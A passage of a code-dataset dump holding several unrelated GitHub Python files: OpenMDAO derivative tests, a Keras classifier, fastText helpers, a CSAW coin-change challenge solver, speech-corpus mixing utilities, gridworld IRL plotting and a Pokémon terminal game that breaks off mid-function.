method=\"fd\", out_stream=None)\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n def test_multi_conn_inputs_promoted(self):\n\n prob = om.Problem()\n prob.model.add_subsystem('px1', om.IndepVarComp('x', 1.0))\n sub1 = prob.model.add_subsystem('sub1', om.Group(), promotes=['y'])\n sub2 = prob.model.add_subsystem('sub2', om.Group(), promotes=['y'])\n\n sub1.add_subsystem('src', om.ExecComp('y=x'), promotes=['y'])\n sub2.add_subsystem('comp1', om.ExecComp('z=x+y'), promotes_inputs=['y'])\n sub2.add_subsystem('comp2', om.ExecComp('z=x+y'), promotes_inputs=['y'])\n sub2.add_subsystem('comp3', om.ExecComp('z=x+y'), promotes_inputs=['y'])\n\n prob.model.connect('px1.x', 'sub1.src.x')\n\n sub2.approx_totals(method='cs')\n\n wrt = ['px1.x']\n of = ['sub2.comp1.z', 'sub2.comp2.z', 'sub2.comp3.z']\n\n prob.setup(mode='fwd')\n prob.run_model()\n\n assert_near_equal(prob['y'], 1.0, 1e-6)\n assert_near_equal(prob['sub2.comp1.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp2.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp3.z'], 2.0, 1e-6)\n\n data = prob.check_totals(of=of, wrt=wrt, method=\"fd\", out_stream=None)\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n # Check the total derivatives in reverse mode\n prob.setup(mode='rev')\n prob.run_model()\n\n assert_near_equal(prob['y'], 1.0, 1e-6)\n assert_near_equal(prob['sub2.comp1.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp2.z'], 2.0, 1e-6)\n assert_near_equal(prob['sub2.comp3.z'], 2.0, 1e-6)\n\n data = prob.check_totals(of=of, wrt=wrt, method=\"fd\", out_stream=None)\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n\nclass FakeGeomComp(om.ExplicitComponent):\n\n def initialize(self):\n self.options.declare(\"n\", types=int)\n\n def setup(self):\n n = self.options[\"n\"]\n self.add_input(\"x0\", val=np.zeros(n), units=\"m\")\n self.add_input(\"feather\", val=0.0, units=\"deg\")\n self.add_output(\"x\", 
val=np.zeros(n), units=\"m\")\n\n self.declare_partials(\"*\", \"*\", method=\"fd\")\n\n self._counter = 0\n\n def compute(self, inputs, outputs):\n self._counter += 1\n feather_rad = inputs[\"feather\"][0]*np.pi/180\n x0 = inputs[\"x0\"]\n\n outputs[\"x\"][:] = 3*np.sin(feather_rad + 0.2)*x0 + 3*feather_rad**2\n\n\nclass FakeAeroComp(om.ExplicitComponent):\n\n def initialize(self):\n self.options.declare(\"n\", types=int)\n\n def setup(self):\n n = self.options[\"n\"]\n\n self.add_input(\"x\", val=np.arange(n), units=\"m\")\n self.add_input(\"omega\", val=7000*2*np.pi/60, units=\"rad/s\")\n\n self.add_output(\"CT\", val=0.5)\n self.add_output(\"CP\", val=0.5)\n\n self.declare_partials(\"*\", \"*\", method=\"fd\")\n\n self._counter = 0\n\n def compute(self, inputs, outputs):\n self._counter += 1\n omega = inputs[\"omega\"][0]\n x = inputs[\"x\"]\n\n outputs[\"CT\"][0] = 0.8*omega**2 + np.sum(x)\n outputs[\"CP\"][0] = 0.1*omega**3 + np.sum(x**2)\n\n\nclass GeometryAndAero2(om.Group):\n\n def initialize(self):\n self.options.declare(\"n\", types=int)\n self.options.declare(\"rho\", types=float)\n self.options.declare(\"vinf\", types=float)\n\n def setup(self):\n n = self.options[\"n\"]\n\n comp = self.add_subsystem(\"init_geom\", om.IndepVarComp(), promotes_outputs=[\"x0\"])\n comp.add_output(\"x0\", val=np.arange(n) + 1.0, units=\"m\")\n\n self.add_subsystem(\"geom\", FakeGeomComp(n=n), promotes_inputs=[\"x0\", \"feather\"], promotes_outputs=[\"x\"])\n self.add_subsystem(\"aero\", FakeAeroComp(n=n), promotes_inputs=[\"x\", \"omega\"], promotes_outputs=[\"CT\", \"CP\"])\n\n def reset_count(self):\n self.geom._counter = 0\n self.aero._counter = 0\n\n\nclass TestSemiTotalsNumCalls(unittest.TestCase):\n\n def test_call_counts(self):\n size = 10\n rho = 1.17573\n minf = 0.111078231621482\n speedofsound = 344.5760217432\n vinf = minf*speedofsound\n\n prob = om.Problem()\n\n omega = 7199.759242*2*np.pi/60\n ivc = prob.model.add_subsystem(\"ivc\", om.IndepVarComp(), promotes_outputs=[\"*\"])\n ivc.add_output(\"feather\", val=0.0, units=\"deg\")\n ivc.add_output(\"omega\", val=omega, units=\"rad/s\")\n\n geom_and_aero = prob.model.add_subsystem('geom_and_aero',\n GeometryAndAero2(n=size, rho=rho, vinf=vinf),\n promotes_inputs=[\"feather\", \"omega\"],\n promotes_outputs=[\"CT\", \"CP\"])\n geom_and_aero.approx_totals(step=step, step_calc=\"abs\", method=\"fd\", form=\"forward\")\n\n prob.model.add_design_var(\"feather\", lower=-5.0, upper=25.0, units=\"deg\", ref=1.0)\n prob.model.add_design_var(\"omega\", lower=3000*2*np.pi/60, upper=7500*2*np.pi/60, units=\"rad/s\", ref=1.0)\n prob.model.add_objective(\"CP\", ref=1e0)\n\n prob.setup(force_alloc_complex=False)\n\n omega = (6245.096992023524*2*np.pi/60) + step\n feather = 0.6362159381168669\n prob.set_val(\"omega\", omega, units=\"rad/s\")\n prob.set_val(\"feather\", feather, units=\"deg\")\n prob.run_model()\n geom_and_aero.reset_count()\n prob.compute_totals(of=[\"CT\"], wrt=[\"feather\", \"omega\"])\n\n self.assertEqual(geom_and_aero.geom._counter, 2)\n self.assertEqual(geom_and_aero.aero._counter, 2)\n\n geom_and_aero.reset_count()\n data = prob.check_totals(method=\"fd\", form=\"forward\", step=step, step_calc=\"abs\", out_stream=None)\n assert_check_totals(data, atol=1e-6, rtol=1e-6)\n\n self.assertEqual(geom_and_aero.geom._counter, 
4)\n","repo_name":"OpenMDAO/OpenMDAO","sub_path":"openmdao/core/tests/test_semitotals.py","file_name":"test_semitotals.py","file_ext":"py","file_size_in_byte":10713,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"53"} +{"seq_id":"23286992444","text":"import sys\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, Activation, Dropout\nfrom sklearn.model_selection import KFold\nfrom keras import regularizers\n\ndef readdata(file_path):\n data = pd.read_csv(file_path)\n data[\"net_gain\"] = (data[\"capital_gain\"] - data[\"capital_loss\"] > 0).astype(\"int\")\n #data[\"is_adult\"] = (data[\"age\"] >= 21).astype(\"int\")\n #data = data[[col for col in data if not col.startswith('?_')]]\n data = data.values\n return data\n\ndef normalize(x_train, x_test):\n x_all = np.concatenate((x_train, x_test), axis = 0)\n mean = np.mean(x_all, axis = 0)\n std = np.std(x_all, axis = 0)\n\n index = [0, 1, 3, 4, 5]\n mean_vec = np.zeros(x_all.shape[1])\n std_vec = np.ones(x_all.shape[1])\n mean_vec[index] = mean[index]\n std_vec[index] = std[index]\n\n x_all_nor = (x_all - mean_vec) / std_vec\n\n x_train_nor = x_all_nor[0:x_train.shape[0]]\n x_test_nor = x_all_nor[x_train.shape[0]:]\n\n return x_train_nor, x_test_nor\n\ndef train(X_TRAIN, Y_TRAIN):\n model = Sequential()\n model.add(Dense(30, input_dim=x_train.shape[1], kernel_regularizer=regularizers.l2(0.001), init='uniform', activation='relu'))\n for i in range(6):\n model.add(Dense(100, kernel_regularizer=regularizers.l2(0.001), init='uniform', activation='relu'))\n Dropout(rate=0.5, seed=0)\n model.add(Dense(1, init='uniform', activation='sigmoid'))\n model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n model.fit(X_TRAIN, Y_TRAIN, nb_epoch=100, batch_size=100, verbose=1)\n model.save(\"bashtest_PassStrong.h5\")\n return\n\ndef toclass(X):\n return np.around(X)\n\ndef predict_n_save(model, data, output_file):\n pred = toclass(model.predict(data)).astype(int).flatten()\n ans = pd.DataFrame({\"id\": np.arange(len(pred))+1, \"label\": pred})\n ans.to_csv(output_file,index=False)\n return\n\ndef main():\n if len(sys.argv) != 7:\n sys.exit(\"Usage: python3 $1 $2 $3 $4 $5 $6\")\n # load data\n x_train = readdata(sys.argv[3])\n y_train = pd.read_csv(sys.argv[4], header=None).values\n x_test = readdata(sys.argv[5])\n x_train, x_test = normalize(x_train, x_test)\n\n # X_TRAIN, X_TEST, Y_TRAIN, Y_TEST = train_test_split(x_train, y_train, test_size=0.3, random_state=0)\n # train(X_TRAIN, Y_TRAIN)\n\n model = load_model(\"FirstPassStrong.h5\")\n predict_n_save(model, x_test, sys.argv[6])\n return\n\nif __name__ == '__main__':\n main()\n","repo_name":"grceliu/ML-2019FALL","sub_path":"hw2/best.py","file_name":"best.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22525832632","text":"import fasttext\nimport time\n\ndef train(inp = \"wiki.he.text\",out_model = \"wiki.he.fasttext.model\",\n alg = \"CBOW\"):\n\n start = time.time()\n\n if alg == \"skipgram\":\n # Skipgram model\n model = fasttext.skipgram(inp, out_model)\n print(model.words) # list of words in dictionary\n else:\n # CBOW model\n model = fasttext.cbow(inp, out_model)\n print(model.words) # list of words in dictionary\n\n print(time.time()-start)\n \n model.save(out_model)\n\n\n\ndef 
getModel(model = \"wiki.he.fasttext.model.bin\"):\n\n model = fasttext.load_model(model)\n\n return model\n","repo_name":"liorshk/wordembedding-hebrew","sub_path":"fasttxt.py","file_name":"fasttxt.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"53"} +{"seq_id":"74589233127","text":"import socket\nimport math\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((\"misc.chal.csaw.io\", 8000))\nline = s.recv(1024).replace(b',',b'')\n\nprint(line)\nwhile True:\n if b'\\n' in line:\n print(line)\n firstLine = line.split(b'\\n')\n if len(firstLine) == 3:\n givenAmount = float(firstLine[1][1:])\n line = firstLine[2].replace(b',', b'')\n\n else:\n givenAmount = float(firstLine[0][1:])\n line = firstLine[1].replace(b',', b'')\n\n else:\n print(b'The line is: ' + line)\n if b'$' in line:\n dollar = line.index(b'$')\n space = line.index(b' ', dollar)\n amount = int(line[dollar+1:space])\n elif b'c' in line:\n if b'half-dollars' in line:\n amount = float(0.50)\n if b'quarters' in line:\n amount = float(0.25)\n if b'dimes' in line:\n amount = float(0.10)\n if b'nickels' in line:\n amount = float(0.05)\n if b'pennies' in line:\n amount = float(0.01)\n print(b'The given amount is: ',givenAmount)\n print(b'The amount is: ', amount)\n if (givenAmount == 0.00):\n s.send(b'0\\n')\n print(\"SENDINGx: 0\")\n elif (givenAmount >= amount):\n s.send(str(int(givenAmount/amount)) + b'\\n')\n print(\"SENDING:\" + str(int(givenAmount/amount)) + b'\\n')\n givenAmount -= round(amount * int(givenAmount/amount),2)\n givenAmount = round(givenAmount,2)\n else:\n s.send(b'0\\n')\n print(\"SENDINGy: 0\")\n line = s.recv(1024).replace(b',',b'')\n if not line:\n break\n\ns.close()","repo_name":"JonathanLPoch/Wargames","sub_path":"Programming/coinslot/coinslot.py","file_name":"coinslot.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21075064515","text":"import os\nimport numpy as np\nimport soundfile as sf\nfrom scipy.signal import resample_poly\n\n\ndef read_scaled_wav(path, start, end, scaling_factor, downsample_8K=False):\n samples, sr_orig = sf.read(path, start=start, stop=end)\n samples = samples / np.max(samples)\n\n if len(samples.shape) > 1:\n samples = samples[:, 0]\n\n if downsample_8K:\n samples = resample_poly(samples, 8000, sr_orig)\n samples *= scaling_factor\n return samples\n\n\ndef wavwrite_quantize(samples):\n return np.int16(np.round((2 ** 15) * samples))\n\n\ndef quantize(samples):\n int_samples = wavwrite_quantize(samples)\n return np.float64(int_samples) / (2 ** 15)\n\n\ndef wavwrite(file, samples, sr):\n \"\"\"This is how the old Matlab function wavwrite() quantized to 16 bit.\n We match it here to maintain parity with the original dataset\"\"\"\n int_samples = wavwrite_quantize(samples)\n sf.write(file, int_samples, sr, subtype='PCM_16')\n\n\ndef append_or_truncate(s1_samples, s2_samples, noise_samples, min_or_max='max', start_samp_16k=0, downsample=False):\n if downsample:\n speech_start_sample = start_samp_16k // 2\n else:\n speech_start_sample = start_samp_16k\n\n speech_end_sample = speech_start_sample + len(s1_samples)\n\n if min_or_max == 'min':\n noise_samples = noise_samples[speech_start_sample:speech_end_sample]\n else:\n s1_append = np.zeros_like(noise_samples)\n s2_append = np.zeros_like(noise_samples)\n s1_append[speech_start_sample:speech_end_sample] = s1_samples\n 
s2_append[speech_start_sample:speech_end_sample] = s2_samples\n s1_samples = s1_append\n s2_samples = s2_append\n\n return s1_samples, s2_samples, noise_samples\n\n\ndef fix_length(s1, s2, s3=[0], min_or_max='max'):\n if len(s3) > 1:\n # Fix length\n if min_or_max == 'min':\n utt_len = min(len(s1), len(s2), len(s3))\n s1 = s1[:utt_len]\n s2 = s2[:utt_len]\n s3 = s3[:utt_len]\n else: # max\n utt_len = min(len(s1), len(s2), len(s3))\n s1 = np.append(s1, np.zeros(utt_len - len(s1)))\n s2 = np.append(s2, np.zeros(utt_len - len(s2)))\n s3 = np.append(s3, np.zeros(utt_len - len(s3)))\n return s1, s2, s3\n else:\n # Fix length\n if min_or_max == 'min':\n utt_len = np.minimum(len(s1), len(s2))\n s1 = s1[:utt_len]\n s2 = s2[:utt_len]\n else: # max\n utt_len = np.maximum(len(s1), len(s2))\n s1 = np.append(s1, np.zeros(utt_len - len(s1)))\n s2 = np.append(s2, np.zeros(utt_len - len(s2)))\n return s1, s2\n \n\n\ndef create_wham_mixes(s1_samples, s2_samples, noise_samples):\n mix_clean = s1_samples + s2_samples\n mix_single = noise_samples + s1_samples\n mix_both = noise_samples + s1_samples + s2_samples\n return mix_clean, mix_single, mix_both\n\n\ndef create_overlap_mixes(s1_samples, s2_samples, s3_samples=[0], full_overlap=True):\n utt_overlaps = []\n utt_len = len(s1_samples)\n if full_overlap:\n overlap_ratios = [1.0]\n else:\n overlap_ratios = [1.0, 0.8, 0.6, 0.4, 0.2, 0.0]\n for overlap_ratio in overlap_ratios:\n append_len = int(utt_len * (0.5 - overlap_ratio / 2) / (0.5 + overlap_ratio / 2))\n if len(s3_samples) == 1:\n zero_append = np.zeros(append_len)\n s1_samples = np.append(s1_samples, zero_append)\n s2_samples = np.append(zero_append, s2_samples)\n mix_samples = s1_samples + s2_samples\n utt_overlaps.append(mix_samples)\n else:\n zero_append = np.zeros(append_len)\n half_append = np.zeros(append_len // 2)\n s1_samples = np.append(s1_samples, zero_append)\n s2_samples = np.append(s2_samples, half_append)\n s2_samples = np.append(half_append, s2_samples)\n s3_samples = np.append(zero_append, s3_samples)\n if len(s1_samples) != len(s2_samples): s2_samples = np.append(s2_samples, [0])\n mix_samples = s1_samples + s2_samples + s3_samples\n utt_overlaps.append(mix_samples)\n return utt_overlaps\n\n\ndef find_cospro_path(cospro_root, s_path):\n # find details of wav\n # ex: s_path: 03-M002_phrase_i_440_000000-000744.wav\n # set_dir: COSPRO_03\n # spk: M002\n # utt_dir: phrase_i\n # utt_num: 440\n # start: 000000\n # end: 000744\n details = s_path.split('.')[0].split('_')\n set_dir = f'COSPRO_{details[0][:2]}'\n spk = details[0].split('-')[-1]\n utt_dir = details[1]\n if set_dir == 'COSPRO_03':\n sub_utt_dir = details[2]\n elif set_dir == 'COSPRO_05':\n utt_dir = utt_dir + '_' + details[2]\n elif set_dir == 'COSPRO_08' and utt_dir == 'phrase':\n sub_utt_dir = details[2]\n elif set_dir == 'COSPRO_09' and len(details) == 5:\n utt_dir = utt_dir + '_' + details[2]\n utt_num = details[-2]\n start = details[-1].split('-')[0]\n start = float(start) / 100\n end = details[-1].split('-')[1]\n end = float(end) / 100\n \n # find wav dir\n if set_dir == 'COSPRO_02':\n if spk[0] == 'F':\n gender = 'Female'\n else:\n gender = 'Male'\n wav_dir = os.path.join(cospro_root, set_dir, gender, spk, utt_dir, 'wav')\n elif set_dir == 'COSPRO_03':\n wav_dir = os.path.join(cospro_root, set_dir, spk, utt_dir, sub_utt_dir, 'wav')\n elif set_dir == 'COSPRO_08' and utt_dir == 'phrase':\n wav_dir = os.path.join(cospro_root, set_dir, spk, utt_dir, sub_utt_dir, 'wav')\n else:\n wav_dir = os.path.join(cospro_root, set_dir, spk, 
utt_dir, 'wav')\n \n # find wav\n wav_name = None\n for wav in os.listdir(wav_dir):\n if utt_num in wav[14:]:\n if not wav.endswith('_f.wav') and not wav.endswith('_s.wav'):\n wav_name = wav\n break\n assert wav_name != None, f'We didn\\'t find {utt_num} in {wav_dir}'\n wav_path = os.path.join(wav_dir, wav_name)\n\n return wav_path, start, end\n\n\ndef find_tat_path(tat_root, s_path):\n # find details of wav\n # ex: s_path: train/condenser/KK_KKM0003_0049-6.9_0002010-0007950.wav\n # set_dir: TAT-Vol1-train\n # spk: KK_KKM0003\n # utt_name: 0049-6.9\n # start: 0002010\n # end: 0007950\n details = s_path.split('/')\n channel = details[1]\n wav_details = details[-1][:-4].split('_')\n\n spk = '_'.join([wav_details[0], wav_details[1]])\n\n utt_name = wav_details[-2]\n channels = ['XYH-6-X', 'XYH-6-Y', 'condenser', 'lavalier', 'ios', 'android']\n channel_num = channels.index(channel) + 1\n utt_name = utt_name + '-0' + str(channel_num) + '.wav'\n\n start = wav_details[-1].split('-')[0]\n start = float(start) / 1000\n end = wav_details[-1].split('-')[1]\n end = float(end) / 1000\n \n # find wav dir\n wav_dir = os.path.join(tat_root, 'TAT-Vol{}', 'TAT-{}-{}', channel, 'wav', spk)\n for vol in [(1, 'Vol1'), (2, 'vol2')]:\n wav_dir_trial = wav_dir.format(vol[0], vol[1], details[0])\n if os.path.isdir(wav_dir_trial):\n wav_path = os.path.join(wav_dir_trial, utt_name)\n\n return wav_path, start, end","repo_name":"Sinica-SLAM/COSPRO-mix","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10131905148","text":"import matplotlib.pyplot as plt\nimport glob\nimport numpy as np\nimport pandas as pd\nimport pickle\n\n\ndef plot_grid(n_samples_irl, res, all_weights, alg_names, save_path=None, fix_re_irl=False):\n mark = ['o', 'x', 's', '*', 'o', 'o']\n n_runs = res.shape[0]\n res_mean = np.mean(res, axis=0)\n res_std = 2 * np.std(res, axis=0) / np.sqrt(n_runs)\n\n df_border = pd.DataFrame()\n df_border['episodes'] = n_samples_irl\n fig, ax = plt.subplots(nrows=1, ncols=1)\n\n for i, name in enumerate(alg_names):\n mean_to_plot = res_mean[:, i]\n std_to_plot = res_std[:, i]\n if name == 're_irl' and fix_re_irl:\n paths = glob.glob('data/gridworld_reirl/gridworld_res_irl_all_0.1.npy')\n res = np.load(paths[0]) # = np.zeros((10, 10, 2, 3))\n mean_to_plot = np.mean(res, axis=0)[:, 0]\n std_to_plot = 2 * np.std(res, axis=0)[:, 0] / np.sqrt(n_runs)\n ax.plot(n_samples_irl, mean_to_plot, label=name, marker=mark[i])\n ax.fill_between(n_samples_irl, mean_to_plot + std_to_plot,\n mean_to_plot - std_to_plot, alpha=0.3)\n\n df_border[name + '_mean'] = mean_to_plot\n df_border[name + '_high'] = mean_to_plot + std_to_plot\n df_border[name + '_low'] = mean_to_plot - std_to_plot\n\n\n\n ax.set_xscale('log')\n ax.set_xlabel('Episodes (n)')\n ax.set_ylabel('Performance')\n ax.set_title('EXPERT 1: Go on Border')\n fig.tight_layout()\n\n ###############################################\n #\n #\n n_runs = all_weights.shape[0]\n res_mean = np.mean(all_weights, axis=0)\n res_std = 2 * np.std(all_weights, axis=0) / np.sqrt(n_runs)\n fig, ax = plt.subplots(nrows=1, ncols=1)\n\n for i, name in enumerate(alg_names):\n mean_to_plot = res_mean[:, i]\n std_to_plot = res_std[:, i]\n if name == 're_irl' and fix_re_irl:\n paths = glob.glob('data/gridworld_reirl/gridworld_res_irl_w_all_0.1.npy')\n res = np.load(paths[0]) # = np.zeros((10, 10, 2, 3))\n mean_to_plot = np.mean(res, axis=0)[:, 0]\n 
std_to_plot = 2 * np.std(res, axis=0)[:, 0] / np.sqrt(n_runs)\n\n ax.plot(n_samples_irl, mean_to_plot, label=name, marker=mark[i])\n ax.fill_between(n_samples_irl, mean_to_plot + std_to_plot,\n mean_to_plot - std_to_plot, alpha=0.3)\n\n df_border[name + '_w_mean'] = mean_to_plot\n df_border[name + '_w_high'] = mean_to_plot + std_to_plot\n df_border[name + '_w_low'] = mean_to_plot - std_to_plot\n\n\n ax.set_xscale('log')\n ax.set_xlabel('Episodes (n)')\n ax.set_ylabel('Norm difference of weights')\n ax.set_title('EXPERT 1: Go on Border')\n ax.legend()\n fig.tight_layout()\n if save_path is not None:\n df_border.to_csv(save_path + '/gridworld_border.csv', index=None)\n plt.show()\n\n\nif __name__ == '__main__':\n load_path = 'data/gridworld_original'\n try:\n with open(load_path + '/agents.pkl', 'rb') as handle:\n alg_names = pickle.load(handle)\n except:\n alg_names = ['GIRL', 'RA-GIRL', 'REIRL', 'REIRL-POS']\n alg_names += ['CSI', 'SCIRL']\n print(alg_names)\n # load returns\n # paths = glob.glob(load_path + '/gridworld_res_irl_all_0.0.npy')\n paths = glob.glob(load_path + '/gridworld_res_irl_0.0.npy')\n\n res = np.load(paths[0]) # = np.zeros((10, 10, 2, 3))\n # load weights\n # paths = glob.glob(load_path + '/gridworld_res_irl_w_all_0.0.npy')\n paths = glob.glob(load_path + '/gridworld_res_irl_w_0.0.npy')\n\n all_weights = np.load(paths[0])\n\n n_samples_irl = [2, 5, 10, 20, 50, 100, 200, 500, 1000,]\n\n plot_grid(n_samples_irl, res, all_weights, alg_names, load_path, fix_re_irl=True)\n","repo_name":"gioramponi/sigma-girl-MIIRL","sub_path":"plot_gridworld.py","file_name":"plot_gridworld.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"20366577739","text":"\"\"\"\r\nPaso de parámetros a funciones: por valor / por referencia\r\n\"\"\"\r\n\r\ndef referencia(Lista:list[int], c:set):\r\n for i in range(5):\r\n Lista.append(i)\r\n c.add(i)\r\n\r\ndef copia(num, s):\r\n num += 100\r\n s += 'hola'\r\n print('En copia: ', num, s)\r\n\r\nif __name__=='__main__':\r\n L = []\r\n c = {1,2,3}\r\n referencia(L, c)\r\n print('L',L)\r\n print('c',c)\r\n numero = 0\r\n s = \"una frase\"\r\n copia(numero, s)\r\n print(numero, s)\r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"aldebarran22/curso_santander_1","sub_path":"codigo_junio/funciones_parametros.py","file_name":"funciones_parametros.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"5575201173","text":"import matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport xarray as xr\nimport sys\nimport imp\nimport os\nimport seaborn as sns\nplt.rcParams.update({'figure.max_open_warning': 0})\n\n\nds_m = xr.open_dataset(r'/media/data2/SnowCast_station_data/merged/Hourly_Merged.nc')\nds_q = xr.open_dataset(r'/media/data2/SnowCast_station_data/QC/Hourly_QC.nc')\n\n# General plotting settings\nsns.set_style('ticks')\nsns.set_context(\"talk\", font_scale=1.5, rc={\"lines.linewidth\": 2.5})\n\n# time\n#ds_m = ds_m.sel(Time_UTC=slice(\"2014-10-01\",\"2017-09-28\"))\n#ds_q = ds_q.sel(Time_UTC=slice(\"2014-10-01\",\"2017-09-28\"))\n\n# vars_to_plot = ['SnowWaterEquivelentA','SnowDepthA','AirtemperatureA']\nvars_to_plot = ['IncrementalPrecipitationA']\nnetwork = 'ABE_AGG_HIST'\n# network = 'CRHO'\n# network = 'all'\n\nprint(set(ds_m.network.values))\nds_m = ds_m[vars_to_plot]\nds_q = ds_q[vars_to_plot]\n\nif network!='all':\n ds_m = 
ds_m.where(ds_m.network==network, drop=True)\n ds_q = ds_q.where(ds_q.network==network, drop=True)\n\nfor cvar in vars_to_plot:\n\n plt.figure()\n plt.title('Merged')\n #plt.plot(ds_m.Time_UTC, ds_m[cvar].sel(staID=['05BJ805' ,'05CA805' ,'2A32P' ,'2C14P' ,'PWL']))\n X = ds_m[cvar]\n for csta in X.staID:\n plt.plot(X.Time_UTC, X.sel(staID=csta),\n label=X.sel(staID=csta).station_name.values)\n plt.legend()\n\n plt.figure()\n plt.title('QC')\n #plt.plot(ds_q.Time_UTC, ds_q[cvar].sel(staID=['05BJ805' ,'05CA805' ,'2A32P' ,'2C14P' ,'PWL']))\n Y = ds_q[cvar]\n for csta in Y.staID:\n plt.plot(Y.Time_UTC, Y.sel(staID=csta),\n label=Y.sel(staID=csta).station_name.values)\n plt.legend()\n\nplt.show()\n\n\n","repo_name":"NicWayand/SnowCast","sub_path":"In_Situ_Data/Test_Plot_Data.py","file_name":"Test_Plot_Data.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10815149074","text":"class Solution(object):\n def canPartition(self, nums):\n s, n, memo = sum(nums), len(nums), {0: True}\n if s & 1: return False\n nums.sort(reverse=True)\n def dfs(i, x):\n if x not in memo:\n memo[x] = False\n if x > 0:\n for j in range(i, n):\n if dfs(j+1, x-nums[j]):\n memo[x] = True\n break\n return memo[x]\n return dfs(0, s >> 1)\n\nclass Solution(object):\n def canFindSum(self, nums, target, ind, n, d):\n if target in d: return d[target] \n if target == 0: d[target] = True\n else:\n d[target] = False\n if target > 0:\n for i in xrange(ind, n):\n if self.canFindSum(nums, target - nums[i], i+1, n, d):\n d[target] = True\n break\n return d[target]\n \n def canPartition(self, nums):\n s = sum(nums)\n if s % 2 != 0: return False\n return self.canFindSum(nums, s/2, 0, len(nums), {}) ","repo_name":"Ayushmanglani/competitive_coding","sub_path":"leetcode/November/27_PartitionEqualSubsetSum.py","file_name":"27_PartitionEqualSubsetSum.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3000973455","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nTest case for thermal standardized load profile generation (SLP)\n\"\"\"\n\nfrom __future__ import division\n\nimport numpy as np\nfrom pycity_base.functions import slp_thermal as slp_th\n\n\nclass TestThermalSLP(object):\n\n def test_average_temperature(self):\n \"\"\"\n Test method for average temperature calculation\n \"\"\"\n test_temp_array = np.array([0, 0, 0, 0, 10, 10, 10, 10, 0, 0, 0, 0,\n 10, 10, 10, 10, 0, 0, 0, 0, 10, 10, 10,\n 10])\n average_temp = slp_th._average_temperature(test_temp_array)\n assert np.average(test_temp_array, weights=[1] + [2] * 22 + [3]) == average_temp[0]\n\n test_temp_array_2 = np.zeros(24*4)\n average_temp_2 = slp_th._average_temperature(test_temp_array_2)\n assert average_temp_2 == [0.0, 0.0, 0.0, 0.0]\n","repo_name":"RWTH-EBC/pyCity","sub_path":"pycity_base/test/test_thermal_slp.py","file_name":"test_thermal_slp.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"4624923657","text":"import random\nfrom pprint import pprint\nfrom Pokemon_get import get_all_pokemons\n\n\ndef get_player_profile(pokemon_list):\n return {\n \"player_name\": \"Seba\", # input(\"Cual es tu nombre?\\n\"),\n \"pokemon_inventory\": [random.choice(pokemon_list) for a in range(3)],\n \"combats\": 0,\n \"pokeballs\": 0,\n \"health_potion\": 0,\n }\n\n\ndef 
any_player_pokemon_lives(player_profile):\n for index in range(len(player_profile[\"pokemon_inventory\"])):\n if player_profile[\"pokemon_inventory\"][index][\"current_health\"] < 0:\n player_profile[\"pokemon_inventory\"][index][\"current_health\"] = 0\n\n return sum([pokemon[\"current_health\"] for pokemon in player_profile[\"pokemon_inventory\"]]) > 0\n\n\ndef choose_pokemon(player_profile):\n chosen = None\n\n inventory_length = player_profile[\"pokemon_inventory\"]\n\n\n while not chosen:\n print(\"Elige con que pokemon lucharás!\")\n for index in range(len(inventory_length)):\n print(\"{} - {}\".format(index, get_pokemon_info(inventory_length[index])))\n try:\n return inventory_length[int(input(\"Cual eliges? \\n\"))]\n except (ValueError, IndexError):\n print(\"Opcion invalida\")\n\n\ndef get_pokemon_info(pokemon):\n return \"{} | lvl {} | {} xp |hp {}/{}\".format(pokemon[\"name\"],\n pokemon[\"level\"],\n pokemon[\"current_exp\"],\n pokemon[\"current_health\"],\n pokemon[\"base_health\"])\n\n\ndef choose_attack(player_pokemon):\n chosen = None\n while not chosen:\n print(\"Elige el ataque!\")\n for index in range(len(player_pokemon[\"attacks\"])):\n #print(int(int(player_pokemon[\"attacks\"][index][\"min_level\"])/10), int(player_pokemon[\"level\"]))\n if player_pokemon[\"attacks\"][index][\"min_level\"] != \"\" and int(int(player_pokemon[\"attacks\"][index][\"min_level\"])/10) <= int(player_pokemon[\"level\"]) :\n \n if int(player_pokemon[\"attacks\"][index][\"damage\"]) == 0:\n \n player_pokemon[\"attacks\"][index][\"damage\"] = 25\n\n print(\"{} - {}\".format(index, get_pokemon_attacks(player_pokemon[\"attacks\"][index])))\n try:\n return player_pokemon[\"attacks\"][int(input(\"\\nCual eliges? \\n\"))]\n except (ValueError, IndexError):\n print(\"Opcion 